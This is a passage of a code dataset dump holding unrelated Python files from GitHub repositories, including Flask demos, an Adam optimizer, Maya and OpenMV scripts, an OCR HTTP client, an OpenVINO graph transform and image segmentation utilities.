request.form['favLang']\n stack = request.form['curStack']\n exp = request.form.getlist('expIn')\n comment = request.form['comment']\n\n return render_template('result.html',\n name=name, location=location, fav_lang=fav_lang,\n stack=stack, exp=\", \".join(exp), comment=comment)\n\nif __name__ == \"__main__\":\n 
app.run(debug=True)","repo_name":"anthony-nagtalon/coding_dojo","sub_path":"flask/flask_fundamentals/dojo_survey/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23950337873","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 25 13:54:30 2017\n\n@author: DA\n\"\"\"\n\nfrom numba import jit\nimport numpy as np\n\n# http://cs231n.github.io/neural-networks-3/#ada\n# http://int8.io/comparison-of-optimization-techniques-stochastic-gradient-descent-momentum-adagrad-and-adadelta/#Adam_8211_description\n# Use moving averages of magnitude and direction of gradient vector\n\n@jit\ndef adam(x, dx, config=None):\n \"\"\"\n Uses the Adam update rule, which incorporates moving averages of both the\n gradient and its square + bias correction\n Config format:\n - learning_rate: Scalar learning rate\n - beta1: Decay rate for moving average of first moment of gradient\n - beta2: Decay rate for moving average of second moment of gradient\n - epsilon: Small scalar used for smoothing to avoid dividing by zero\n - m: Moving average of gradient\n - v: Moving average of squared gradient\n - t: Iteration number\n \"\"\"\n if config is None: config = {}\n config.setdefault('learning_rate', 1e-3)\n config.setdefault('beta1', 0.9)\n config.setdefault('beta2', 0.999)\n config.setdefault('epsilon', 1e-8)\n config.setdefault('m', np.zeros_like(x))\n config.setdefault('v', np.zeros_like(x))\n config.setdefault('t', 0)\n\n config['t'] += 1\n \n # Exponential moving average\n config['m'] = config['beta1']*config['m'] + (1-config['beta1'])*dx\n config['v'] = config['beta2']*config['v'] + (1-config['beta2'])*(dx**2)\n\n # Warm-up phase\n mt = config['m'] / (1-config['beta1']**config['t'])\n vt = config['v'] / (1-config['beta2']**config['t'])\n\n next_x = x - config['learning_rate'] * mt / (np.sqrt(vt) + config['epsilon']) \n \n return next_x, config","repo_name":"DataDan01/CS231n-Notes","sub_path":"Assignment 2/Clean Attempt/optim_algs.py","file_name":"optim_algs.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"40107188127","text":"# -*- coding: utf-8 -*-\n# author:yangtao\n# time: 2022/11/08\n\n# 此脚本用来检查物体是否过于巨大,或者距离坐标中心太远\n\nimport maya.cmds as cmds\n\n\n# 获取选中的 transform 节点\ntransforms = cmds.ls(sl=True, type=\"transform\")\n# 不能超过的最大值,100000\n__far = 1e5\n\n\ninvalid = []\nfor tran in transforms:\n # 获取世界坐标下物体位置的最大最小值\n # boundingBox 的返回的值按以下顺序排列:xmin ymin zmin xmax ymax zmax\n bounding_box = cmds.xform(tran, q=1, worldSpace=True, boundingBox=True)\n # 最小值小于 -1e5 或者 最大值大于 1e5 为无效物体\n if any(x < -__far for x in bounding_box[:3]) \\\n or any(x > __far for x in bounding_box[3:]):\n invalid.append(tran)\n\nif invalid:\n raise ValueError(\"Nodes found far away or of big size ('{far}'): {0}\".format(invalid, far=__far))","repo_name":"Tody190/ExampleCode","sub_path":"MayaCode/MayaValidateCode/validate_scene_dimensions.py","file_name":"validate_scene_dimensions.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23563879119","text":"import functools\nimport shutil\nfrom pathlib import Path\nfrom functools import lru_cache\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom loguru import logger\nfrom torch import Tensor\nimport torch\nfrom skimage.io 
import imsave\nimport warnings\nfrom typing import *\n\nfrom Storage_and_Meter.metric_container import SummaryWriter, __tensorboard_queue__\nfrom general_utils.dataType_fn_tool import _empty_iterator, _is_tensor, _is_iterable_tensor\n\nimport zipfile\nimport os\n\ndef save_segmentations(segs: Tensor, names: Iterable[str], root: Union[str, Path], mode: str, data_idx) -> None:\n # save the segmentation maps\n (b, w, h) = segs.shape # type: Tuple[int, int,int] # Since we have the class numbers, we do not need a C axis\n with warnings.catch_warnings():\n warnings.filterwarnings('ignore', category=UserWarning)\n for seg, name in zip(segs, names):\n if data_idx in ['BraTS20']:\n save_path = Path(root, mode, name[8:11], name).with_suffix(\".png\") # BraTS20\n elif data_idx in['mmwhs', 'mmwhs_new']:\n save_path = Path(root, mode, name[9:13], name).with_suffix(\".png\") # mmwhs\n\n save_path.parent.mkdir(parents=True, exist_ok=True)\n imsave(str(save_path), seg.cpu().numpy().astype(np.uint8))\n\ndef save_shifted_Imgs(imgs: Tensor, names: Iterable[str], root: Union[str, Path], mode: str, data_idx) -> None:\n if isinstance(imgs, Tensor):\n (b, w, h) = imgs.shape # type: Tuple[int, int,int] # Since we have the class numbers, we do not need a C axis\n with warnings.catch_warnings():\n warnings.filterwarnings('ignore', category=UserWarning)\n for img, name in zip(imgs, names):\n if data_idx in ['BraTS20']:\n save_path = Path(root, mode, name[8:11], name).with_suffix(\".png\") # BraTS20\n elif data_idx in ['mmwhs', 'mmwhs_new']:\n save_path = Path(root, mode, name[9:13], name).with_suffix(\".png\") # mmwhs\n\n save_path.parent.mkdir(parents=True, exist_ok=True)\n imsave(str(save_path), img.cpu().numpy())\n elif isinstance(imgs, List):\n imgs = torch.stack(imgs, dim=1).squeeze(2)\n n, steps, g, w = imgs.shape\n with warnings.catch_warnings():\n warnings.filterwarnings('ignore', category=UserWarning)\n idx = 0\n for img in imgs:\n iter = 0\n for iter_img in img:\n if data_idx in ['BraTS20']:\n save_path = Path(root, mode, names[idx][8:11], names[idx], f'{iter}').with_suffix(\".png\") # BraTS20\n elif data_idx in ['mmwhs', 'mmwhs_new']:\n save_path = Path(root, mode, names[idx][9:13], names[idx], f'{iter}').with_suffix(\".png\") # mmwhs\n\n save_path.parent.mkdir(parents=True, exist_ok=True)\n imsave(str(save_path), iter_img.cpu().numpy())\n iter = iter + 1\n idx = idx + 1\n\n\ndef seg_results(img, label):\n # img.shape = n h w, 1 row n colum visualization\n fig = plt.figure()\n assert img.shape == label.shape\n assert len(img.shape) == 3\n\n n,h,w = img.shape\n for i in range(1, n+1):\n ax = plt.subplot(1, n, i)\n img_sub = tensor2plotable(img[i-1])\n ax.imshow(img_sub, cmap=\"gray\")\n label_sub = tensor2plotable(label[i-1])\n ax.contour(label_sub)\n return fig\n\ndef save_diffusion_imgs(imgs: Union[Tensor, List], root: Union[str, Path], cur_epoch) -> None:\n if isinstance(imgs, list):\n imgs = torch.stack(imgs, dim=1).squeeze(2)\n n, iter, g, w = imgs.shape\n with warnings.catch_warnings():\n warnings.filterwarnings('ignore', category=UserWarning)\n idx = 0\n for img in imgs:\n iter = 0\n for iter_img in img:\n save_path = Path(f'runs', root, f'{cur_epoch}epoch', f'{idx}_img', f'DPM_T_{iter}').with_suffix(\".png\")\n save_path.parent.mkdir(parents=True, exist_ok=True)\n imsave(str(save_path), iter_img.cpu().numpy())\n iter = iter + 1\n idx = idx + 1\n\n elif isinstance(imgs, Tensor):\n (b, w, h) = imgs.shape # type: Tuple[int, int,int] # Since we have the class numbers, we do not need a C axis\n with 
warnings.catch_warnings():\n warnings.filterwarnings('ignore', category=UserWarning)\n idx = 0\n for img in imgs:\n save_path = Path(f'runs', root, f'{cur_epoch}epoch', f'{idx}_img', f'TO').with_suffix(\".png\")\n save_path.parent.mkdir(parents=True, exist_ok=True)\n imsave(str(save_path), img.cpu().numpy())\n idx = idx + 1\n\n\n\ndef save_sdfmaps(diffusion_sdf, style):\n n1, n2, h, w = diffusion_sdf.shape\n fig = plt.figure()\n for i1 in range(1, n1 + 1):\n for i2 in range(1, n2 + 1):\n ax = plt.subplot(n1, n2, (i1 - 1) * n1 + i2)\n img = diffusion_sdf[i1 - 1, i2 - 1]\n\n if style == 'hot': # probability map\n im_ = ax.imshow(img, cmap=\"hot\")\n fig.colorbar(im_, ax=ax, orientation='vertical')\n elif style == 'grey': # features map\n img = tensor2plotable(img)\n ax.imshow(img, cmap='gray')\n plt.title(f'SDF_DPMSDF')\n return fig\n\ndef tensor2plotable(tensor) -> np.ndarray:\n if isinstance(tensor, np.ndarray):\n return tensor\n elif isinstance(tensor, torch.Tensor):\n return tensor.detach().cpu().numpy()\n else:\n raise TypeError(f\"tensor should be an instance of Tensor, given {type(tensor)}\")\n\ndef multi_slice_viewer_debug(\n img_volume: Union[Tensor, List[Tensor], Tuple[Tensor, ...]],\n *gt_volumes: Tensor,\n no_contour=False,\n block=False,\n alpha=0.2,\n) -> None:\n def process_mouse_wheel(event):\n fig = event.canvas.figure\n for i, ax in enumerate(fig.axes):\n if event.button == \"up\":\n previous_slice(ax)\n elif event.button == \"down\":\n next_slice(ax)\n fig.canvas.draw()\n\n def process_key(event):\n fig = event.canvas.figure\n ax = fig.axes[0]\n if event.key == \"j\":\n previous_slice(ax)\n elif event.key == \"k\":\n next_slice(ax)\n fig.canvas.draw()\n\n def previous_slice(ax):\n img_volume = ax.img_volume\n ax.index = (ax.index - 1) if (ax.index - 1) >= 0 else 0 # wrap around using %\n ax.images[0].set_array(img_volume[ax.index])\n\n if ax.gt_volume is not None:\n if not no_contour:\n for con in ax.con.collections:\n con.remove()\n ax.con = ax.contour(ax.gt_volume[ax.index])\n else:\n ax.con.remove()\n ax.con = ax.imshow(ax.gt_volume[ax.index], alpha=alpha, cmap=\"rainbow\")\n ax.set_title(f\"plane = {ax.index}\")\n\n def next_slice(ax):\n img_volume = ax.img_volume\n ax.index = (\n (ax.index + 1)\n if (ax.index + 1) < img_volume.shape[0]\n else img_volume.shape[0] - 1\n )\n ax.images[0].set_array(img_volume[ax.index])\n\n if ax.gt_volume is not None:\n if not no_contour:\n for con in ax.con.collections:\n con.remove()\n ax.con = ax.contour(ax.gt_volume[ax.index])\n else:\n ax.con.remove()\n ax.con = ax.imshow(ax.gt_volume[ax.index], alpha=alpha, cmap=\"rainbow\")\n ax.set_title(f\"plane = {ax.index}\")\n\n ## assertion part:\n assert _is_tensor(img_volume) or _is_iterable_tensor(\n img_volume\n ), f\"input wrong for img_volume, given {img_volume}.\"\n assert (\n _is_iterable_tensor(gt_volumes) or gt_volumes == ()\n ), f\"input wrong for gt_volumes, given {gt_volumes}.\"\n if _is_tensor(img_volume):\n img_volume = [img_volume]\n row_num, col_num = len(img_volume), max(len(gt_volumes), 1)\n\n fig, axs = plt.subplots(row_num, col_num)\n if not isinstance(axs, np.ndarray):\n # lack of numpy wrapper\n axs = np.array([axs])\n axs = axs.reshape((row_num, col_num))\n\n for _row_num, row_axs in enumerate(axs):\n # each row\n assert len(row_axs) == col_num\n for _col_num, ax in enumerate(row_axs):\n ax.img_volume = tensor2plotable(img_volume[_row_num])\n ax.index = ax.img_volume.shape[0] // 2\n ax.imshow(ax.img_volume[ax.index], cmap=\"gray\")\n ax.gt_volume = (\n None\n if 
_empty_iterator(gt_volumes)\n else tensor2plotable(gt_volumes[_col_num])\n )\n try:\n if not no_contour:\n ax.con = ax.contour(ax.gt_volume[ax.index])\n else:\n ax.con = ax.imshow(\n ax.gt_volume[ax.index], alpha=alpha, cmap=\"rainbow\"\n )\n except:\n pass\n ax.axis(\"off\")\n ax.set_title(f\"plane = {ax.index}\")\n\n fig.canvas.mpl_connect(\"key_press_event\", process_key)\n fig.canvas.mpl_connect(\"scroll_event\", process_mouse_wheel)\n plt.show(block=block)\n\n#---------seg line----------\ndef get_tb_writer() -> SummaryWriter:\n if len(__tensorboard_queue__) == 0:\n raise RuntimeError(\n \"`get_tb_writer` must be call after with statement of a writer\"\n )\n return __tensorboard_queue__[-1]\n\nclass switch_plt_backend:\n\n def __init__(self, env=\"agg\") -> None:\n super().__init__()\n self.env = env\n\n def __enter__(self):\n self.prev = matplotlib.get_backend()\n matplotlib.use(self.env, force=True)\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n matplotlib.use(self.prev, force=True)\n\n def __call__(self, func):\n functools.wraps(func)\n\n def wrapper(*args, **kwargs):\n with self:\n return func(*args, **kwargs)\n\n return wrapper\n\nclass FeatureMapSaver:\n\n def __init__(self, save_dir: Union[str, Path], folder_name=\"vis\", use_tensorboard: bool = True) -> None:\n assert Path(save_dir).exists() and Path(save_dir).is_dir(), save_dir\n self.save_dir: Path = Path(save_dir)\n self.folder_name = folder_name\n (self.save_dir / self.folder_name).mkdir(exist_ok=True, parents=True)\n self.use_tensorboard = use_tensorboard\n\n @switch_plt_backend(env=\"agg\")\n def save_map(self) -> None:\n \"\"\"\n Args:\n\n \"\"\"\n # todo\n\n def zip(self) -> None:\n \"\"\"\n Put all image folders as a zip file, in order to avoid IO things when downloading.\n \"\"\"\n try:\n shutil.make_archive(str(self.save_dir / self.folder_name.replace(\"/\", \"_\")), 'zip',\n str(self.save_dir / self.folder_name))\n shutil.rmtree(str(self.save_dir / self.folder_name))\n except (FileNotFoundError, OSError, IOError) as e:\n logger.opt(exception=True, depth=1).warning(e)\n\n @property\n @lru_cache()\n def tb_writer(self):\n try:\n writer = get_tb_writer()\n except RuntimeError:\n writer = None\n return writer\n\ndef compress_and_delete_folder(folder_path):\n \"\"\"\n Compresses a folder using the `shutil` module and deletes the original folder\n using the `os` module to release disk space.\n\n Parameters:\n -----------\n folder_path : str\n The path to the folder that needs to be compressed and deleted.\n\n Returns:\n --------\n None\n \"\"\"\n # Get the name of the folder for naming the zip file\n folder_name = os.path.basename(folder_path)\n\n # Compress the folder into a zip file\n shutil.make_archive(folder_name, 'zip', folder_path)\n\n # Delete the original folder to release disk space\n shutil.rmtree(folder_path)\n","repo_name":"WangPing521/DPM_code_share","sub_path":"general_utils/image_save_fn_tool.py","file_name":"image_save_fn_tool.py","file_ext":"py","file_size_in_byte":12010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10883953490","text":"#num = int(input('Digite o número: '))\r\n#for c in range(1, num+1):\r\n# if num / c == 1 and num / 1 == c and num % 2 != 0 and num % 3 != 0 and num % 5 != 0:\r\n# print('Número primo')\r\nnum = int(input('Digite o número: '))\r\ndiv = 0\r\nfor c in range(1, num+1):\r\n if num % c == 0 and num % num == 0:\r\n div += 1\r\nif div == 2:\r\n print('O número {} só tem {} divisores, e portanto é 
primo.'.format(num, div))\r\nelse:\r\n    print('O número {} possui {} divisores, e portanto não é primo.'.format(num, div))\r\nprint('Acabou')\r\n","repo_name":"lcaldara/python3","sub_path":"exercicios curso em video/desafio52 - num primo.py","file_name":"desafio52 - num primo.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21053659885","text":"import sys\nfrom PyQt5.QtWidgets import *\nclass Windows(QWidget):\n    def __init__(self):\n        super().__init__()\n        self.init_ui()\n\n    def init_ui(self):\n        self.setFixedSize(300,150)\n        #外层容器\n        container=QVBoxLayout()\n        #表单容器\n        form_layout=QFormLayout()\n        #账号输入框\n        edit1=QLineEdit()\n        edit1.setPlaceholderText(\"请输入账号:\")\n        form_layout.addRow(\"账号:\",edit1)\n        #密码输入框\n        edit2=QLineEdit()\n        edit2.setPlaceholderText(\"请输入密码:\")\n        form_layout.addRow(\"密码:\",edit2)\n\n        #form_layout添加到垂直布局容器里\n        container.addLayout(form_layout)\n        \n\n        #按钮\n        login_btn=QPushButton(\"登录\")\n        login_btn.setFixedSize(100,30)\n        container.addWidget(login_btn)\n        \n        self.setLayout(container)\n\nif __name__==\"__main__\":\n    app=QApplication(sys.argv)\n    w=Windows()\n    w.show()\n    # w.resize()\n    w.resize(300,200)\n    w.setWindowTitle(\"表单布局\")\n    app.exec()\n\n\n","repo_name":"6iujiale/All_Projects","sub_path":"Python/python模块/PyQt/code/布局/QFormLayout_表单布局.py","file_name":"QFormLayout_表单布局.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38823549721","text":"\"\"\"!Constants used throughout the tcutil package\n\nThis module contains various constants, including the Earth\n\"radius\" and unit conversions. Unit conversion constants are given as\nfractions.Fraction objects to allow the conversion to be exact.\"\"\"\n\n##@var __all__\n# ensures that \"from tcutil.constants import *\" does nothing\n__all__=['']\n\nimport fractions\n\n# Metric/SI/nautical unit conversions: these conversions are exact.\n# knots, nmi: http://www.nist.gov/pml/wmd/metric/length.cfm\n# ft/inches: http://physics.nist.gov/cuu/Units/outside.html\n\n##@var ft2m\n# \"\"\"US foot to meters conversion (exact).\"\"\"\nft2m = fractions.Fraction(12*254,10000)\n\"\"\"US foot to meters conversion (exact).\"\"\"\n\n##@var m2ft\n# Meters to US foot conversion (exact).\nm2ft = 1/ft2m\n\"\"\"Meters to US foot conversion (exact).\"\"\"\n\n##@var nmi2km\n# Nautical miles to kilometers conversion (exact).\nnmi2km = fractions.Fraction(1852,1000)\n\"\"\"Nautical miles to kilometers conversion (exact).\"\"\"\n\n##@var km2nmi\n# Kilometers to nautical miles conversion (exact).\nkm2nmi = 1/nmi2km\n\"\"\"Kilometers to nautical miles conversion (exact).\"\"\"\n\n##@var kts2mps\n# Knots to meters per second conversion (exact).\nkts2mps = fractions.Fraction(1852,3600)\n\"\"\"Knots to meters per second conversion (exact).\"\"\"\n\n##@var mps2kts\n# Meters per second to knots conversion (exact).\nmps2kts = 1/kts2mps\n\"\"\"Meters per second to knots conversion (exact).\"\"\"\n\n# Various earth radii from the tcutilutil library constants_module:\n##@var Rpole\n# EGM2008 Earth radius at the pole.\nRpole = 6356752.3142\n\"\"\"EGM2008 Earth radius at the pole.\"\"\"\n\n##@var Requator\n# EGM2008 Earth radius at the equator.\nRequator = 6378137.0000\n\"\"\"EGM2008 Earth radius at the equator.\"\"\"\n\n##@var flattening\n# EGM2008 Earth flattening ratio.\nflattening = 1/298.257223563\n\"\"\"EGM2008 Earth flattening ratio.\"\"\"\n\n##@var REmean\n# Earth 
mean ellipsoid radius from IUGG 1980\nREmean = 6371009.0\n\"\"\"Earth mean ellipsoid radius from IUGG 1980\"\"\"\n\n##@var REauthalic\n# Earth authalic (equal surface area) radius from IUGG 1980\nREauthalic = 6371007.2\n\"\"\"Earth authalic (equal surface area) radius from IUGG 1980\"\"\"\n\n##@var REvolume\n# Earth equal volume radius from IUGG 1980\nREvolume = 6371000.8\n\"\"\"Earth equal volume radius from IUGG 1980\"\"\"\n\n##@var RErectifying\n# Earth rectivying (equal circumference) radius from IUGG 1980\nRErectifying = 6367449.1\n\"\"\"Earth rectivying (equal circumference) radius from IUGG 1980\"\"\"\n\n##@var Rearth\n# A compromise: the average of the mean ellipsoid radius, authalic radius and equal volume radius\nRearth = (REmean+REauthalic+REvolume)/3\n\"\"\"Average of the mean ellipsoid radius, authalic radius and equal\nvolume radius.\"\"\"\n","repo_name":"hafs-community/HAFS","sub_path":"ush/tcutil/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"} +{"seq_id":"16334393826","text":"#\n# utility library\n# this module must be manually copied into the root folder of the OpenMV Cam\n#\n\nimport pyb, math, time\nimport sensor, image\n\nperspective_factor = None # typical range 0.10 - 0.20 for \"normal\" lens\nwantPerspectiveCorrection = False\nperspective_corrector = None\nhisteq_wanted = False\nnegate_wanted = False\n\ndef constrain(value, min, max):\n if value < min :\n return min\n if value > max :\n return max\n else:\n return value\n\ndef init_perspective_corrector():\n global perspective_factor, wantPerspectiveCorrection, perspective_corrector\n perspective_factor = 0.35\n lens_corr_factor = 1.85\n wantPerspectiveCorrection = False\n\ndef correct_perspective(img):\n global perspective_factor, wantPerspectiveCorrection, perspective_corrector\n if wantPerspectiveCorrection:\n img.rotation_corr( corners = perspective_corrector )\n #img.lens_corr(lens_corr_factor)\n\ndef set_histeq_wanted(newState):\n global histeq_wanted\n if (newState == 1):\n histeq_wanted = True\n else:\n histeq_wanted = False\n\ndef set_negate_wanted(newState):\n global negate_wanted\n if (newState == 1):\n negate_wanted = True\n else:\n negate_wanted = False\n\ndef get_histeq_wanted():\n global histeq_wanted\n return histeq_wanted\n\ndef get_negate_wanted():\n global negate_wanted\n return negate_wanted\n\n\ndef set_perspective_correction(newState):\n global wantPerspectiveCorrection\n wantPerspectiveCorrection = newState\n\ndef set_perspective_factor(new_factor):\n global perspective_factor, w_left, w_right, wantPerspectiveCorrection, perspective_corrector\n w = sensor.width()\n h = sensor.height()\n perspective_factor = new_factor\n w_left = (perspective_factor * w)\n w_right = w - (perspective_factor * w)\n perspective_corrector = [ [w_left, 0], [w_right, 0], [w, h], [0, h] ]\n\n\ndef set_cam_rez_for_blobs(sensor):\n global perspective_factor, perspective_corrector\n sensor.set_pixformat(sensor.RGB565)\n sensor.set_framesize(sensor.QQVGA) # use QQVGA for speed.\n w = sensor.width()\n h = sensor.height()\n w_left = (perspective_factor * w)\n w_right = w - (perspective_factor * w)\n perspective_corrector = [ [w_left, 0], [w_right, 0], [w, h], [0, h] ]\n return\n\ndef set_cam_rez_for_grayscale(sensor):\n global perspective_factor, perspective_corrector\n sensor.set_pixformat(sensor.GRAYSCALE)\n sensor.set_framesize(sensor.QQVGA) # use QQVGA for speed.\n w = sensor.width()\n h = 
sensor.height()\n w_left = (perspective_factor * w)\n w_right = w - (perspective_factor * w)\n perspective_corrector = [ [w_left, 0], [w_right, 0], [w, h], [0, h] ]\n return\n\ndef set_cam_rez_for_lane_lines(sensor):\n global perspective_factor, perspective_corrector\n sensor.set_pixformat(sensor.GRAYSCALE)\n sensor.set_framesize(sensor.QQVGA) # use QQVGA for speed.\n w = sensor.width()\n h = sensor.height()\n w_left = (perspective_factor * w)\n w_right = w - (perspective_factor * w)\n perspective_corrector = [ [w_left, 0], [w_right, 0], [w, h], [0, h] ]\n return\n\ndef set_cam_rez_for_regression_lines(sensor):\n global perspective_factor, perspective_corrector\n # note QQQVGA yeilds approx 75 FPS, QQVGA yields approx 40 FPS\n sensor.set_pixformat(sensor.GRAYSCALE)\n #sensor.set_pixformat(sensor.RGB565)\n sensor.set_framesize(sensor.QQQVGA)\n #sensor.set_framesize(sensor.QQVGA)\n w = sensor.width()\n h = sensor.height()\n w_left = (perspective_factor * w)\n w_right = w - (perspective_factor * w)\n perspective_corrector = [ [w_left, 0], [w_right, 0], [w, h], [0, h] ]\n return\n","repo_name":"dnkorte/DonKCar","sub_path":"code_openmv/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":3656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33860604535","text":"import json\r\nimport requests\r\nimport os\r\nimport base64\r\nimport sys\r\nsys.path.append(\"..\")\r\nimport ocr.utils\r\n\r\n\r\n\r\nclass HTTPReader():\r\n def __init__(self, sdk=\"MLKit\",url=\"http://192.168.8.68:8888/\"):\r\n self.url = url\r\n self.sdk = sdk\r\n self.postprocessing = \"mrz\"\r\n self.need_sort = True\r\n \r\n def ocr(self, img_path):\r\n with open(img_path, \"rb\") as img_file:\r\n b64_string = base64.b64encode(img_file.read())\r\n dic = {'base64':b64_string.decode(\"utf-8\"),'sdk':self.sdk}\r\n r = requests.post(self.url, json = dic)\r\n result_dict = json.loads(r.text)\r\n lines = result_dict[\"results\"]\r\n if self.need_sort:\r\n lines = ocr.utils.sort_boxes(lines)\r\n result_dict[\"raw_boxes\"] = lines\r\n result_dict[\"boxes\"] = ocr.utils.postprocess(self.postprocessing,lines)\r\n \r\n result_dict.pop(\"results\")\r\n return result_dict\r\n \r\n \r\nif __name__ == '__main__':\r\n\r\n reader = HTTPReader()\r\n \r\n results = reader.ocr(\"test.jpg\")\r\n print(results)\r\n ","repo_name":"xulihang/OCR-Benchmark-Tool","sub_path":"ocr/http_reader.py","file_name":"http_reader.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13023439449","text":"import numpy as np\n\nfrom extensions.middle.AnchorToPriorBox import AnchorToPriorBoxes\nfrom mo.graph.graph import Graph\nfrom mo.middle.replacement import MiddleReplacementPattern\nfrom mo.ops.const import Const\n\n\nclass SsdAnchorsMiddleReplacer(MiddleReplacementPattern):\n \"\"\"\n Replacing subgraph with all anchors constant to constant op with pre calculated prior boxes values.\n \"\"\"\n enabled = True\n force_clean_up = True\n graph_condition = [lambda graph: graph.graph['fw'] == 'mxnet' and graph.graph['cmd_params'].enable_ssd_gluoncv]\n\n def run_after(self):\n return [AnchorToPriorBoxes]\n\n\n def pattern(self):\n return dict(\n nodes=[\n ('const', dict(op='Const')),\n ('const_data', dict(kind='data')),\n ('reshape0', dict(op='Reshape')),\n ('reshape0_data', dict(kind='data')),\n ('reshape1', dict(op='Reshape')),\n ('reshape1_data', dict(kind='data')),\n ('reshape2', 
dict(op='Reshape')),\n ('reshape2_data', dict(kind='data')),\n ('reshape3', dict(op='Reshape')),\n ('reshape3_data', dict(kind='data')),\n ('concat', dict(op='Concat')),\n ],\n edges=[\n ('const', 'const_data'),\n ('const_data', 'reshape0'),\n ('reshape0', 'reshape0_data'),\n ('reshape0_data', 'reshape1'),\n ('reshape1', 'reshape1_data'),\n ('reshape1_data', 'reshape2'),\n ('reshape2', 'reshape2_data'),\n ('reshape2_data', 'reshape3'),\n ('reshape3', 'reshape3_data'),\n ('reshape3_data', 'concat'),\n ])\n\n def replace_pattern(self, graph: Graph, match: dict):\n #self.pattern()['nodes']\n concat_node = match['concat']\n if len(concat_node.out_nodes()[0].out_nodes()) == 0:\n return\n const_values = []\n for in_node_index in concat_node.in_nodes():\n current_node = concat_node.in_port(in_node_index).get_source().node\n for k, v in reversed(self.pattern()['nodes'][:-1]):\n if 'op' in v:\n assert current_node.op == v['op']\n current_node = current_node.in_port(0).get_source().node\n if current_node.op == 'Const':\n crop_value = current_node.value\n crop_value = np.reshape(crop_value, (1, -1))\n const_values.append(crop_value)\n break\n concat_value = np.concatenate(tuple(const_values), axis=1)\n concat_value = np.reshape(concat_value, (1, 2, -1))\n slice_value = concat_value[0][0]\n for i in range(int(concat_value[0][0].size / 4)):\n index = i * 4\n xmin = slice_value[index] - (slice_value[index+2] / 2)\n ymin = slice_value[index + 1] - (slice_value[index + 3] / 2)\n xmax = slice_value[index] + (slice_value[index + 2] / 2)\n ymax = slice_value[index + 1] + (slice_value[index + 3] / 2)\n slice_value[index] = xmin\n slice_value[index + 1] = ymin\n slice_value[index + 2] = xmax\n slice_value[index + 3] = ymax\n\n val_node = Const(graph, {'name': concat_node.name + '/const_',\n 'value': concat_value}).create_node_with_data()\n out_node = concat_node.out_port(0).get_destination().node\n concat_node.out_port(0).disconnect()\n out_node.in_port(2).connect(val_node.in_node().out_port(0))\n","repo_name":"Namptiter/OpenVINO-Darknet-YOLOv3","sub_path":"model_optimizer/extensions/middle/ssd_anchors_to_const.py","file_name":"ssd_anchors_to_const.py","file_ext":"py","file_size_in_byte":3628,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"24645858989","text":"import json\r\nfrom flask import Flask\r\n\r\n\r\napp = Flask(__name__,static_url_path='/static')\r\n\r\ncontacts=[]\r\nDATA=\"contacts.json\"\r\ndef load():\r\n with open(DATA, \"r\") as f:\r\n return json.load(f)\r\n\r\ndef save():\r\n with open(DATA,\"w\") as f:\r\n return json.dump(contacts,f,indent=4)\r\n\r\n\r\n@app.route(\"/\", methods=['GET','POST'])\r\ndef hello_world():\r\n return \"\"\"

    <h1>hello world</h1>
    \r\n <a href=\"/about\">About</a>\r\n <a href=\"/search\">Search</a>\r\n <a href=\"/add-json\">Add json</a>\r\n <a href=\"/remove-json\">Remove json</a>\r\n \"\"\"\r\n\r\n@app.route(\"/about/\")\r\n@app.route(\"/about/<int:id>\")\r\ndef about(id=0):\r\n    if id == 0:\r\n        return contacts\r\n    elif 0 < id <= len(contacts):\r\n        return contacts[id-1]\r\n\r\n\r\n@app.route(\"/add-json/<name>/<int:age>\")\r\ndef add_json(name,age):\r\n    contacts.append({\"name\":name, \"age\":age})\r\n    save()\r\n    return contacts\r\n\r\n\r\n@app.route(\"/search\")\r\n@app.route(\"/search/<name>\")\r\ndef search(name):\r\n    for contact in contacts:\r\n        if contact[\"name\"] == name:\r\n            return contacts\r\n    \r\n\r\n\r\n@app.route(\"/remove-json\")\r\n@app.route(\"/remove-json/<name>\")\r\ndef remove_json(name):\r\n    for contact in contacts:\r\n        if contact[\"name\"] == name:\r\n            contacts.remove(contact)\r\n            save()\r\n    return contacts\r\n\r\n\r\napp.run(debug=True)\r\n","repo_name":"matan922/hw1","sub_path":"amain.py","file_name":"amain.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26985327621","text":"from skimage import data, io, segmentation, color\nfrom skimage.future import graph\nimport numpy as np\nimport cv2\n\ndef weight_mean_color(graph, src, dst, n):\n    d = graph.node[dst]['mean color'] - graph.node[n]['mean color']\n    d = np.linalg.norm(d)\n    return {'weight': d}\ndef merge_mean_color(graph, src, dst):\n    graph.node[dst]['total color'] += graph.node[src]['total color']\n    graph.node[dst]['pixel count'] += graph.node[src]['pixel count']\n    graph.node[dst]['mean color'] = graph.node[dst]['total color'] / graph.node[dst]['pixel count']\n\n#main\n#img = data.coffee()\nimg = io.imread(\"C:\\\\Users\\\\shyam\\\\Downloads\\\\quiz_bg2.png\")\nimg = cv2.resize(img, (1024, 1024))\nlabels = segmentation.slic(img, compactness=30, n_segments=400)\ng = graph.rag_mean_color(img, 